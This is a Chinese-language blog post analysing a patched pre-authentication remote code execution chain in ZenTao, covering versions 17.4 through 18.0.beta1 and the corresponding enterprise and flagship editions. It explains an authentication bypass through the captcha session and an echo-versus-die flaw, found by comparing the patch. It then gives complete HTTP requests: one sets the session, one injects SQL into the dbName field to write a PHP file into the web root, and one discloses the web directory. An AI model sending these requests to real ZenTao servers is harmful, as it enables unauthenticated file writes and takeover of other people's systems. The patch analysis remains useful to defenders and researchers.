c1ay's blog

禅道zentao组合漏洞rce

字数统计: 804阅读时长: 3 min
2023/01/13 Share

看到很多地方都发了,那也没必要再藏了…

本地环境:18.0.beta1

影响版本

17.4<=version<=18.0.beta1(开源版)

3.4<=version<=4.0.beta1(旗舰版)

7.4<=version<=8.0.beta1(企业版)

利用条件

无需登录,无条件

权限绕过

登录校验会依次经过:

framework/base/control.class.php->__construct方法

www/index.php:$common->checkPriv();

mark

补丁对比

通过补丁对比:

module/common/model.php->checkPriv方法

mark

看到将echo $endResponseException->getContent();修复为了die($endResponseException->getContent());

无需登录白名单:

config/zentaopms.php

mark

在module/misc/control.php的captcha方法当中,存在session赋值

1
2
3
4
5
6
7
8
9
10
11
GET /zentao/misc-captcha-user HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead;
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

权限绕过原理:

在设置完session user变量后,会进入module/common/model.php->checkPrivif(isset($this->app->user))分支

mark

接着会进入$this->deny($module, $method);

跟进到module/common/model.php->deny方法

mark

最终会执行到helper::end();

跟进到framework/helper.class.php->end方法

mark

抛出了EndResponseException异常,而module/common/model.php->checkPriv当中直接接收了异常并输出,之后程序会继续运行,导致权限绕过

mark

而补丁将echo修改为了die,程序走到这里会终止退出,不再继续往后执行,从而修复了权限绕过

SQL注入

通过补丁对比:
module/convert/model.php->dbExists方法

mark

可以看到修复了一处sql注入

全局搜索dbExists,可以看到在module/convert/control.php的importNotice方法中进行了调用

mark

对应路由:
/zentao/convert-importNotice

通过注入可以直接写文件,结合之前的权限绕过,可以实现前台文件写入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /zentao/convert-importNotice HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.174
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://192.168.157.174
Connection: close
Pragma: no-cache
Cache-Control: no-cache
dbName=1';select '<?php phpinfo();?>' into outfile 'C:/Users/admin/Desktop/zbox/app/zentao/www/install.php'-- -

mark

web目录获取

注入写文件需要知道web目录,有很多方法,这里只提供一种

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /zentao/repo-create HTTP/1.1
Host: 192.168.157.174
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.157.174/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: zentaosid=0f94562eee63fdffc089ad8a3e867ead
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://192.168.157.174/
Connection: close
Pragma: no-cache
Cache-Control: no-cache
SCM=Subversion&name=1&path=1&encoding=utf-8&client=1&account=1&password=1&encrypt=base64&desc=&uid=626134383da5e

mark

再提一下:
后台漏洞还有很多,例如命令执行,这里不再赘述,这次的rce重点还是在于权限绕过,结合后台漏洞升级为前台rce

CATALOG
  1. 1. 影响版本
  2. 2. 利用条件
  3. 3. 权限绕过
  4. 4. SQL注入